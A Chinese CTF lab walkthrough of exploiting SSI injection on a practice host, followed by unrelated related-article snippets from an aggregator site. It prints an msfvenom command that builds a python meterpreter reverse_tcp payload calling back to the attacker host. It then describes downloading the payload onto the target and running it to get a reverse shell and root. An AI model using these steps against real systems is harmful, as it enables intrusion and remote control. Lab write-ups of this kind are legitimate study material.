ctf php sql注入,CTF—攻防练习之HTTP—SQL注入(SSI注入)

主机:192.168.32.152

靶机:192.168.32.161

ssI是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤

该网站可能存在SSI注入漏洞

ssi注入就是寻找输入点输入类似 格式,看看能不能运行系统命令。

如  

切换目录

nmap,nikto 分析,发现可能存在SSI注入,

45cee5c0ffba25a40357a890f70b219a.png

dirb 看看目录

index目录下,有个SSi语句

1df3d0c5d31e74cf40c99c7a9ca7c516.png

SSI目录下看到应该是和命令注入有关

b652c3a4de2cf42d1f2d0ed1da5128e6.png

通过robots.txt目录挖掘到站点的根目录

ac0ec0f320706ee0756bd3b2fbfee0f2.png

打开网页找一个注入点,测试后,在这里找到,发现有过滤,大小写可绕过,网页给出的测试命名少了个!符号,加上测试成功

f80187b401553c5518f439b08f1c5dcd.png

925cd8ae50bdf2e93aa3341ed6d7daa4.png

此时我们就可以尝试生成一个python shell 上传到网站服务器根目录上,再执行反弹监听

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444

在打开msfconsole监听

此时再将生成的pyshell上传至web根目录(/var/www/html),再打开apache服务器

38c58e65d5eb7c951b3e6dffc02ab64d.png

在开启apache服务器,查看状态

77e2a27cb047d518f8ce0c72d35cbb50.png

再将pyshell下载到站点上

3ddf261115d7f51537238f5507ea4d64.png

再提权

然后启动python pyshell.py,成功反弹shell!

0b1b548294baf1327d3e77db5b9a1d83.png

随后,进入shell,优化终端,可以进入root目录

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/295151.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

OAuth 2.1 带来了哪些变化

OAuth 2.1 是 OAuth 2.0 的下一个版本, OAuth 2.1 根据最佳安全实践(BCP), 目前是第18个版本,对 OAuth 2.0 协议进行整合和精简, 移除不安全的授权流程, 并发布了 OAuth 2.1 规范草案, 下面列出了和 OAuth 2.0 相比的主要区别。⚡ 推荐使用 Authorization Code PKC…

转仁兄:Binary search and its variation

http://fihopzz.blogspot.com/2013/07/enter-post-title-here-binary-search-and.html转载于:https://www.cnblogs.com/kwill/p/3230655.html

生孩子要趁早 3

说到猝死,前两天又有报道说哪个搞IT的年纪轻轻的嗝儿屁了;我想:其实哪个行业都有这么几个倒霉孩子;这也就是搞网络报道的公司的身边的事儿,才被程序员们通过网络转来转去;那些搬砖、运煤的就没有年纪轻轻累…

使用OClint进行iOS项目的静态代码扫描

使用OClint进行iOS项目的静态代码扫描 原文链接:http://blog.yourtion.com/static-code-analysis-ios-using-oclint.html 最近需要一个静态分析代码工具,帮助我们发布运行应用前找到代码潜在的问题。 其实对于iOS开发,我们的日常开发上已经用…

Linux命令常用大全

系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpuinfo…

54个站在人类智商巅峰的男人!告诉你2400年的物理学史里都有什么……

全世界只有3.14 % 的人关注了爆炸吧知识一沙见世界 一花窥天堂手心握无限 须臾纳永恒杨振宁曾说读上面的四句诗可以感受到物理的美但物理的美不至于此物理还有一种庄严美一种神秘美一种初窥宇宙奥秘的畏惧美物理就是如此的迷人任何语言在它的面前都很贫瘠数学让人摆脱了愚昧而…

C#实现ByteBuffer类 .

在写网络程序的时候,经常需要往一个数组里面压数据或者取数据,而Java中再Java.nio中有个ByteBuffer能很方便的实现,Delphi中也有个Stream类有着同样的功能,这里我就模仿JAVA用C#做个最基础的ByteBuffer类 下面是代码 usingSystem;namespaceSystem.ByteBuffer...{ /**//// &l…

mysql中如何删除表中int约束,MySQL中的约束,添加约束,删除约束,以及其他修饰

一.NOT NULL(非空约束)添加非空约束1)建表时直接添加CREATE TABLE t_user(user_id INT(10) NOT NULL);2)通过ALTER 语句ALTER TABLE t_user MODIFY user_id INT(10) NOT NULL;ALTER TABLE t_user CHANGE user_id user_id INT(10) NOT NULL;删除非空约束1)ALTER TABLE t_user MO…

asp.net 6中的mini api和mvc api性能对比

在.net6发布时,带来了一个新的模板框架,mini api,那与之前的mvc api性能对比是什么样的呢?建了基于.net 6的两种模板项目,都实现了一个get /test01的api请求,代码如下:mini api:app.MapGet(&quo…

lsass.exe文件丢失,损坏

有一天因为WSUS下发策略的时候更新了某些补丁,导致了系统在登录的时候提示lsass.exe文件丢失,损坏,一时间用了修复工具和恢复使用前都不行,于是好好研究了下。在一台完好使用的同一个系统的PC上复制了system32里面的lsass.exe&…

利用Guava的Suppliers.memoize实现单例

序 本文主要介绍如何利用Guava的Suppliers.memoize实现单例。 实例 /*** 利用Suppliers.memoize实现单例* Created by xixicat on 15/12/25.*/ public class SuppilerSingletonTest {class HeavyObject{public HeavyObject() {System.out.println("being created");}…

Android之水平ProgressBar多彩背景颜色

ProgressBar多彩的背景颜色 不废话,先爆照,如下图。 activity_main.xml <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"xmlns:tools="http://schemas.android.com/tools"android:layout_wi…

冰箱堪比「垃圾桶」?这根棒除味又保鲜,更能 99% 超强杀菌!

{}▲ 点击查看每天的饭菜、生鲜、零食、饮料、干货&#xff0c;总能把我家冰箱塞得满满当当。各种饭菜干货窜味儿&#xff0c;蔬果开始发烂发臭&#xff0c;每天打开冰箱都是一次「开门杀」……用柚子皮和竹炭包除味根本不行&#xff0c;从根源上改善冰箱环境才是硬道理。跟市面…

mac apache2 php,Mac OSX 之 PHP开发环境Apache2配置

time : 2018-03-23author : HGD_IS 李亮星一.事件因果一个星期前&#xff1a;不想下载XAMMP或者MAMP之类的IDE&#xff0c;而且下载完谷歌服务器一直只有放弃按钮&#xff0c;在Finder中打开也是不可打开文件状态&#xff0c;谷歌浏览器给出的解释是该App可能损害我的电脑&…

如何通过 C# 生成安全的 Base64 URL 字符串?

咨询区 Vishvesh Phadnis&#xff1a;在 C# 中如何实现对 URL 进行安全的 base64 编码&#xff0c;在 JAVA 中我可以使用 Codec 类库来实现此功能&#xff0c;我目前是这么实现的。byte[] toEncodeAsBytes System.Text.ASCIIEncoding.ASCII.GetBytes("StringToEncode&quo…

System.getProperty()参数

java.version Java 运行时环境版本 java.vendor Java 运行时环境供应商 java.vendor.url Java 供应商的 URL java.home Java 安装目录 java.vm.specification.version Java 虚拟机规范版本 java.vm.specification.vendor Java 虚拟机规范供应商 java.vm.specificat…

不变模式

不变模式 不变模式&#xff08;immutable pattern&#xff09; 一个类的内部状态创建后&#xff0c;在整个生命期间都不会发生变化时&#xff0c;就是不变类。这种使用不变类的做法叫做不变模式。 不变模式有两种形式&#xff1a;一种是弱不变模式&#xff0c;另一种是强不变模…

了解SQL Server触发器及触发器中的事务

引述 首先&#xff0c;写这篇文章的目的是望能把我对触发器的理解&#xff0c;分享出来与大家一起学习。如果你对触发器和事务的概念有些了解&#xff0c;这篇文章对你来说会是很简单&#xff0c;或能让你更进一步的了解触发器里面的一些故事&#xff0c;以及触发器中事务的故…

swift学习笔记-----swift中的指针

swift语言为了简化&#xff0c;把指针隐形化了。没有像OC中那样的“ * ”。把底层的问题交给C语言去处理&#xff0c;我们可以在swift中调用C 语言来解决。当然&#xff0c;OC也是可以调用的。但是在某些场景下&#xff0c;这种调用可能不是很方便。比如&#xff0c;基于字节流…

多个php一个机器,如何利用docker在同一台机器上搭建多套php开发环境?

首先是一个容器要包含完整的程序加依赖(出去中间件)&#xff0c;拿 LNMP 举例子&#xff1a;docker 提供的是 Linux 环境&#xff0c;容器中要包含 Nginx 和 Php&#xff0c;然后再单独部署一个 MySQL其次&#xff0c;如果多个环境&#xff0c;可以使用多个容器&#xff0c;简单…